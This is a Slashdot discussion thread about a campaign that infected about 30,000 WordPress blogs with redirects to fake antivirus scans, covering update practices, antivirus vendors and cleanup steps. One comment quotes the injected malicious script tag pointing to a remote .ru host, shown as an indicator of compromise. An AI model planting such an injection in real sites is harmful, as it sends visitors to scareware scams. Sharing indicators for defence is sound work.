30K WordPress Blogs Infected With the Latest Malware Scam

alphadogg writes with an excerpt from an article over at Network World: "Almost 30,000 WordPress blogs have been infected in a new wave of attacks orchestrated by a cybercriminal gang whose primary goal is to distribute rogue antivirus software, researchers from security firm Websense say. The attacks have resulted in over 200,000 infected pages that redirect users to websites displaying fake antivirus scans. The latest compromises are part of a rogue antivirus distribution campaign that has been going on for months, the Websense researchers said."

McAfee?

[Oswald+McWeany]

websites displaying fake antivirus scans

I didn't know McAfee had started targeting Web blogs now.

Re:McAfee?

[tepples]

It might be hard to believe, but there are antivirus companies even less scrupulous than McAfee and Norton. Wikipedia explains.

Re:McAfee?

[Ihmhi]

Selectively disabling parts of the system to prevent the user from uninstalling the malware. Some may also prevent anti-malware programs from running, disable automatic system software updates and block access to websites of anti-malware vendors.

I dunno, sounds like Norton to me.

Re:McAfee?

[hairyfeet]

Oh Lord, please don't say that name! Poor Jim is still rocking himself in the corner going "It just won't uninstall! Why won't it uninstall? It just won't go away" after the last wave of Norton infected laptops came through and we have finally got his mumbling quieted down, please don't give Jim a flashback!

As for TFA this is why I recommend the combo of Win 7 with either Avast or Comodo IS along with Comodo Dragon with ABP. Windows 7 has DEP and ASLR along with UAC and Comodo Dragon is able to take advantage of the low rights mode for browsers built in, ABP blocks the ads that are the source of many an infection, Avast and Comodo IS have built in sandboxing which adds another layer of protection but while Avast has a simpler UI for home users Comodo IS is free for business AND home so its really a preference thing.

With this combo I took an offlease i was planning to wipe anyway and tried my damnedest to infect the thing. I went to every crapsite and topsite and "punch the monkey to win an iPod" and scammer haven i could find and afterwards ran a half a dozen offline scans, nothing. Zip zero zilch nada. Most of the nasty sites were blocked by the Comodo SecureDNS option in Dragon and when I turned that off both Avast and Comodo IS blocked the sites from loading the malware so I'd say that is a resounding success. i know i have customers (as well as family, ugh) that can pick up bugs like a Bangkok Whore on a Saturday night yet since switching them over to this combo they have been completely bug free, and with them that's saying a lot.

Analysis

[SirDice]

Why do they always focus on the crap that's left behind when they analyses these things? I want to know how they managed to get that stuff on those servers so I can check my own. Was is an old and vulnerable WordPress or was it some 0-day they used? For some reason they always focus on the effects and not on the causes.

Re:Analysis

[WankersRevenge]

From the fine article:

Many of the blogs compromised in these recent attacks were running outdated WordPress versions, had vulnerable plug-ins installed or had weak administrative passwords susceptible to brute force attacks, said David Dede, a security researcher with website integrity monitoring firm Sucuri Security. "It seems the attackers are trying everything lately."

Re:Analysis

[SirDice]

Ah, that helps. I only read the WebSense analysis hoping to read some details there. Apart from mentioning WordPress there isn't much in there how they actually got in.

Re:Analysis

[drobety]

For what it's worth, looking at the recent 404 errors on my site, I've notice many (failed fortunately) requests related to Ajax File And Image Manager 1.0 Final Code Execution

wordpress, again?

[v1]

Is it just a popularity/contrast thing, or does wordpress seem to be popping up a lot recently for security holes in their web servers?

Re:wordpress, again?

[Spad]

At a guess, the ratio of Installs to Unpatched/Insecure Installs, both of the core WP software and its many, many 3rd party plugins and themes.

A *lot* of sites are either running old versions of software or have plugins/themes with gaping vulnerabilities that are no longer under active development.

Re:wordpress, again?

[gmack]

Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

Re:wordpress, again?

Set up WP MultiSite, update one site and one set of plugins and be done with it - easy as that...

Re:wordpress, again?

[nick.sideras]

Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

This drove me nuts at my current job for about 2 months - you need Wordpress Network.

There's the easy way and the hard(er) way to do this:

This is the official easy way, but it's never worked for me (last tried in Spring of 2011). The nice thing is that it's all stuff built into WordPress, so you should be able to do it without any problems. I'd say it's probably worth giving this a try with one site, and if it works, run with it.

This is more down and dirty way that will definitely work, and is more or less how I did it. A little SQL editing never hurt anyone.
Also, this is a great companion to the bavatuesdays link. He goes on about his DNS in the first few paragraphs, but the second half of that post has some good details about where files need to be, and how links and such need to be updated.

Once you have a network, you a fantastic "Update Network" button. Boom. Take the rest of the day off.

Re:wordpress, again?

[aussiedood]

Agreed! At least you only have 15, I've just been given the task of managing our Wordpress implementation, we're at 144. *Ugh*

Re:wordpress, again?

[X0563511]

That has anything to do with Wordpress?

Doesn't even make sense. Windows has automatic updating, something Linux distros are just starting to do (notifying has been around for a while, but automatically acting is "new")

Re:wordpress, again?

[ArsenneLupin]

Or failing to find a specific solution for Wordpress: Use perl's WWW::Mechanize to click that DB upgrade link (and any other GUI-only things) for you.

Re:wordpress, again?

[turbidostato]

"notifying has been around for a while, but automatically acting is "new""

Do you really consider something that has been available, well, forever as new? (I'll just mention cron-apt as an example).

Re:wordpress, again?

[Anonymus]

WordPress is extremely easy and quick to update. You can click a single button and update every single plugin and theme, or another button to update core. That's it. If you're upgrading by manually uploading files to a bunch of different servers for some reason, you should at least look into something like updating with Subversion or using multisite and just updating once for every site.

Re:wordpress, again?

[Hatta]

You can't automatically log into a website and click a link with a very small shell script?

Re:wordpress, again?

[Anonymus]

I personally think it's mostly a popularity thing, since WordPress pretty much owns the blog market. I think the other problem, however, is just with how simple they've made it to accidentally backdoor your site. There are thousands of plugins for WordPress, installable with just a couple of clicks, written by people who know nothing about security, or have possibly even maliciously left holes in their plugin. Unlike large projects that are generally maintained and reviewed by dozens of people, a plugin is usually written by one person who could just decide to backdoor your site in the next update.

I've got a couple of moderately popular plugins, and every time I release an update I think about just how easy it would be to take over thousands of sites by just adding a few innocuous-looking lines of code. Except I'm not evil, so I don't.

Re:wordpress, again?

[X0563511]

It is neither installed or mentioned during a standard system installation. That's the difference.

Re:wordpress, again?

[X0563511]

Er, no. Try again. Preferably with more reading comprehension.

Re:wordpress, again?

[element-o.p.]

Seriously? It's a hassle to have to log into each server and click a link?

You must never have run Gentoo*...

*Which is still my favorite distro, despite occasionally being a real PITA to update.

Re:wordpress, again?

[turbidostato]

"It is neither installed or mentioned during a standard system installation. That's the difference."

Neither is Apache therefore web servers are the new thing, is that your point?

Of course not. I know what your point is: that no *true* Scotsman...

Re:wordpress, again?

[X0563511]

That's funny, that's all I'm hearing from YOU, the AC.

Re:wordpress, again?

[X0563511]

What?

What does apache have to do with it? The idiot was talking about OS auto updating, which I pointed out had nothing to do with anything.

I then went on to say that even if it DID have anything to do with it, he was wrong anyway.

Re:wordpress, again?

[gmack]

I used to love hand compiling everything but then I got my first full time sysadmin job. The job came with 20 servers and thankfully 15 of them ran Debian. When you have to do something repeatedly it gets old quickly so now I want the OS to do as much as possible and script most of the rest.

Re:wordpress, again?

[gmack]

Awesome, thanks for the heads up.

Re:wordpress, again?

[element-o.p.]

LOL. I've been a full time sys admin for ten years -- first with Solaris and FreeBSD servers, then in my current job with about 15 or so Gentoo (!) servers plus my laptop and a desktop. We migrated to Ubuntu about three years ago. In all honesty, we do a much better job of updating the Ubuntu servers than we did the Gentoo servers because it is so much easier to do, but I am starting to loathe my Ubuntu laptop. It's a lot easier to get wireless working in Ubuntu than Gentoo, but Unity, nVidia drivers*, and a few other problems are really starting to sour me on Ubuntu. I'm hoping 12.04 will bring back the stability I experienced up to 10.10; IMHO, the 11.xx series is Canonical's Vista.

*Yes, I know, those are proprietary drivers. I can't blame Canonical entirely for that, but IIRC, there are much newer drivers available that aren't available in the official "restricted" repositories.

Re:wordpress, again?

[gmack]

I gave up on the new Ubuntu pretty quickly while installing a friend's notebook last month and ended up installing debian + xfce + wicd. No complaints from him at all.

For servers, it's hard to beat debian + dotdeb repo.

Re:wordpress, again?

[mattrad]

Well my clicking-averse friend, you need managewp.com. One login and a click or two, and you've updated all those 15 installs. Either that or migrate everything to multisite (Backup Buddy is great for that).

Re:wordpress, again?

[Pf0tzenpfritz]

You mean "the fact that I have missed to write some working update/deployment script is annoying"? Come on - it's not that hard. Just rsync anything but wp-content. Make sure they all have the same plugins installed but not necessarily activated and sync the plugins folder, too. That's for starters. The elegant way involves delivering images and "uploads" from a CDN and simply unpacking the new versions over the old ones by rsync, ftp or wget...

Method of infection

[dgharmon]

"The Websense ThreatSeeker Network has detected a new wave of mass-injections of a well-known rogue antivirus campaign"

How exactly are these sites infected in the first place?

"The page looks like a Windows Explorer window with a "Windows Security Alert" dialogue box in it"

Ahh so - nothing to read here ... moving on ...

Re:Method of infection

[Pope]

I used to get those all the time on my Mac and just laugh. Then they made a special OS X-looking one.

Re:Method of infection

[Rick17JJ]

A number of years ago, I encountered a fake Microsoft security warning while using my Linux computer. It said that Microsoft had detected viruses and spyware on my computer. This was on a Linux computer that did not have any Microsoft products installed on it.

It offered to do a free online scan of my hard drive. Despite clicking on No, a progress bar appeared as it started to do a fake scan of my hard drive. After about 60 seconds, it said that it had finished scanning my drive C. It then said that several different viruses and types of spyware had been detected in both my registry and on drive C. The funny thing is that Linux does not have a registry and also does not use drive letters to designate hard drive partitions.

It listed the names of several viruses that my Linux computer was supposedly infected with. Despite knowing that the test was bogus, I looked up those virus names out of curiosity, and found they were all Windows only viruses. Their scareware ad then offered to sell me their antivirus product, to remove the viruses and spyware.

My understanding is that most desktop users of Linux, have never felt the need to use antivirus software, because Linux viruses have never been a problem.

Despite their supposedly thorough scan of my registry and drive C, they had not noticed that I was not using Windows. Has anyone bothered yet to make a Linux version of their scareware ads?

Re:Method of infection

[klui]

So looks like the injected code
</DIV> <!-- END body-wrapper -->
<script src="http://ionis90landsi.rr.ru/mm.php?=1"></script>
</BODY>
</HTML>
would be take care of with NoScript as long as your white list is short and doesn't contain rr.nu in this example.

Specialist ISP of Transnistria.. again.

[Dynamoo]

It looks like the first step in the infection is via an IP (194.28.114.103) belonging to Specialist ISP of Transnistria. That has featured before on Slashdot in this story.

The block 194.28.112.0/22 is simply all evil (I've documented it here in the past), there's no reason to send traffic to it at all, blocking it is a good option.

Re:Specialist ISP of Transnistria.. again.

[gaspyy]

Transnistria is basically a haven for organized crime. A "republic" with virtually no international recognition, a very small economy and ties with international arm dealers.

Re:Specialist ISP of Transnistria.. again.

[Dynamoo]

Exactly. It's a country that doesn't exist in the eyes of most other countries, which makes it beyond the reach of international law enforcement. There are other countries in the world like that, the difference with Transnistria is that it has a somewhat modern infrastructure.

Why bother with an infector?

[Opportunist]

Why bother using 0day exploits and payload droppers when the best infector is sitting right in front of the PC?

Re:Why bother with an infector?

[DigiShaman]

Agreed. The best form of hacking isn't technical, it's social. This is what happens when con artists turn to technology as another venue by which to exploit people.

Re:Why bother with an infector?

[Opportunist]

About time politicians discover the net as something useful!

Continued Password Problem

[Neutral_Observer]

Anyone else continuing to have a problem when you type your password that it shows instead of ******? My password is ilikegirrlz See, it did it again!

Re:Continued Password Problem

Hunter2
 
Now get off my lawn!

Re:Its 2012 and yet still...

[X0563511]

Are you an idiot? The article is talking about WORDPRESS - a web application! Windows isn't involved!

For Newbs: Steps to Fix

[dgrotto]

Most of my WP installs were infected because I am a slack ass. Here are the high level steps I took to solve the problem:

• 1) Backup sites.
• 2) Fix all world-writable directories in your WP install (what the hell WP?!). This seems to be the primary vector for getting in.
• 3) Clean up infected PHP files with this script from php-beginners.com. Thank you Paolo.
• 4) Inspect all .htaccess configs for errant redirects and fix.
• 5) Install and run the timthumb vulnerability scanner. Possible secondary vector. Thank you Peter Butler!
• 6) Update your WP install to latest and greatest.
• 7) Remove any unused plugins and themes.
• 8) Backup sites.

I may be missing something - again, I'm a slackass. Anyone else have other advice for our admin-challenged friends besides "get a real software package"?

By the way, I was trying to lock down one of my WP installs to only allow authed users access to posts. However, WP does not put the assets for post - usually in wp-content/uploads - behind the auth wall. It's just out there for the whole world to see. It was a simple fix to rewrite the .htaccess config for this directory to redirect to an auth script, but still it still shocks me how insecure this app is.

Re:For Newbs: Steps to Fix

[dgrotto]

Forgot one thing:

The hack puts a list of sites to redirect to in a .logs directory. rm these.

Re:Its 2012 and yet still...

[NotBorg]

You're right no one would ever want to involve Windows with their Wordpress install. The year of Windows on the server will never come.

Related drive-by malware

[ThatsNotPudding]

BTW: why is Adobe allowed to - by default - check the box on their flash updates to also install Norton on the victims computer? How many trusting civilians (think: grandmothers) end up with borked computers with conflicting AV programs solely due to corporate greed? I'm willing to bet this check box (if it even appears) is NOT checked by default in the EU market. Man, I miss government FOR the people...

Re:Related drive-by malware

[LunaticTippy]

Norton is malware in my opinion. I wish all the antivirus software would block it.

Norton tries to provide a working uninstaller

[tepples]

At least Norton tries to provide a working removal tool at no charge. The only problem I've found is that it's made deliberately inaccessible to blind users (with a CAPTCHA) so that malware doesn't automatically run it on every computer that it tries to infect.

and I was looking for a blog site

[Skapare]

And I was looking for a blog hoster this week, and specifically at WordPress. Anyone got a list of free blog hosters (moving away from blogspot)?

Which versions?

[sigaar]

Any idea which versions of Wordpress is being targeted and/or which vulnerability? The quoted articles look more like commercials for Websense.

So where does the malware get downloaded to idiot?

[Viol8]

Wordpress is the vector.

Fscking moron.

Re:So where does the malware get downloaded to idi

[X0563511]

So? The article is talking about the vector, not the payload.

Fscking moron.